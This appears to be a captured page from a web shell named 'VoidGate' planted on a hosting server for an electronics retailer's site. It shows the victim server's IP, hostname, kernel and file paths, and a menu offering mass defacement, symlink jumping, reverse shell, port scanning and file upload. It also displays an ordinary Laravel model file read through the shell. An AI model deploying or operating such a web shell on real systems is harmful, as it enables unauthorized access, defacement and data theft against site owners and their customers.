ヤミRoot VoidGate
User / IP
:
216.73.217.88
Host / Server
:
147.79.72.174 / www.jigishaelectronics.com
System
:
Linux us-bos-web1572.main-hosting.eu 5.14.0-611.38.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 10 17:21:28 EDT 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u852776893
/
domains
/
jigishaelectronics.com
/
public_html
/
app
/
Models
/
Viewing: CustomerProduct.php
<?php namespace App\Models; use Illuminate\Database\Eloquent\Model; use App\Traits\PreventDemoModeChanges; use App; class CustomerProduct extends Model { use PreventDemoModeChanges; protected $with = ['customer_product_translations']; public function getTranslation($field = '', $lang = false) { $lang = $lang == false ? App::getLocale() : $lang; $customer_product_translations = $this->customer_product_translations->where('lang', $lang)->first(); return $customer_product_translations != null ? $customer_product_translations->$field : $this->$field; } public function scopeIsActiveAndApproval($query) { return $query->where('status', '1') ->where('published', '1'); } public function category() { return $this->belongsTo(Category::class); } public function subcategory() { return $this->belongsTo(SubCategory::class); } public function subsubcategory() { return $this->belongsTo(SubSubCategory::class); } public function brand() { return $this->belongsTo(Brand::class); } public function user() { return $this->belongsTo(User::class); } public function state() { return $this->belongsTo(State::class); } public function city() { return $this->belongsTo(City::class); } public function customer_product_translations() { return $this->hasMany(CustomerProductTranslation::class); } public function thumbnail() { return $this->belongsTo(Upload::class, 'thumbnail_img'); } }
Coded With 💗 by
0x6ick